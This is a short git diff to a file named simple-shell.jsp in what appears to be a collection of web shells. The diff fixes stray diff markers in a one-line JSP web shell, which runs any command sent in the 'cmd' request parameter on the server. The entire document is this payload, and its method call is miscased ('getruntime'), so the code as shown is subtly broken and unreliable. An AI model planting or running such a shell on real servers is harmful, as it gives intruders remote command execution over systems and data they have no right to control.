diff --git a/Web-Shells/JSP/simple-shell.jsp b/Web-Shells/JSP/simple-shell.jsp index 3c15f24a..dd21aa97 100644 --- a/Web-Shells/JSP/simple-shell.jsp +++ b/Web-Shells/JSP/simple-shell.jsp @@ -1,3 +1,3 @@ -+<% -+Runtime.getruntime().exec(request.getParameter("cmd")) -+%> +<% +Runtime.getruntime().exec(request.getParameter("cmd")) +%>